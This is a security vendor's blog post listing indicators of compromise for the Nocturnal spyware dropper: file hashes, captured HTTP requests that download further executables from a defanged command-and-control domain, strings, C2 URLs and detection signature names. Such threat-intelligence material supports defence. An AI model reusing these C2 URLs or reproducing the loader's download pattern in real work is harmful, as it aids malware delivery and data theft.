Wins blog

Malware Info: Win32/Spyware.Nocturnal (Dropper)
Posted 2018-06-05 | Views 733

ㅁ Malware IoC

Pattern  : Win32/Spyware.Nocturnal (Dropper)
Filename : -
Type     : exe
Size     : 6,634,136 bytes
MD5      : 9d5184d60ec2fc6444d00de8927d5e37

ㅁ Malware Traffic

GET /loder/go.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0
Host: resourcetuner[.]space

GET /loder/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0
Host: resourcetuner[.]space

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Jun 2018 02:39:22 GMT
Content-Type: application/x-msdownload
Content-Length: 2186392
Connection: keep-alive
Last-Modified: Tue, 29 May 2018 16:35:47 GMT
Expires: Sat, 04 Aug 2018 02:39:22 GMT
Cache-Control: max-age=5184000
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Nginx-Cache-Status: BYPASS
X-Server-Powered-By: Engintron
Pragma: public
Accept-Ranges: bytes

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.

GET /loder/2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0
Host: resourcetuner[.]space

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Jun 2018 02:39:35 GMT
Content-Type: application/x-msdownload
Content-Length: 1891280
Connection: keep-alive
Last-Modified: Tue, 29 May 2018 16:35:47 GMT
Expires: Sat, 04 Aug 2018 02:39:35 GMT
Cache-Control: max-age=5184000
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Nginx-Cache-Status: BYPASS
X-Server-Powered-By: Engintron
Pragma: public
Accept-Ranges: bytes

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.

GET /loder/3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0
Host: resourcetuner[.]space

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 05 Jun 2018 02:39:45 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 328
Connection: keep-alive
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff

ㅁ Malware String

 -  ASCII : hxxp://resourcetuner[.]space/loder/go.html
 -  ASCII : hxxp://resourcetuner[.]space/loder/1.exe
 -  ASCII : hxxp://resourcetuner[.]space/loder/2.exe
 -  ASCII : hxxp://resourcetuner[.]space/loder/3.exe

 -  ASCII : C:Program Files (x86)/Resource Tuner/ResTuner

 -  ASCII : %userappdata%/RestartApp.exe
 -  ASCII : C:Program Files (x86)/Resource Tuner/ResTuner/Updater.exe

ㅁ Malware C2

 - hxxp://resourcetuner[.]space/loder/go.html
 - hxxp://resourcetuner[.]space/loder/1.exe
 - hxxp://resourcetuner[.]space/loder/2.exe
 - hxxp://resourcetuner[.]space/loder/3.exe

ㅁ Malware Hash

 - 205def439aeb685d5a9123613e49f59d4cd5ebab9e933a1567a2f2972bda18c3

ㅁ Wins Sniper Pattern

 - [4342] Win32/Spyware.Nocturnal.Connection

 - [4343] Win32/Spyware.Nocturnal.2186392

 - [4344] Win32/Spyware.Nocturnal.1891280

 - [4345] Win32/Spyware.Nocturnal.2159648

ㅁ Wins APTX
Source

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

Tags: Spyware, Nocturnal, Malware Info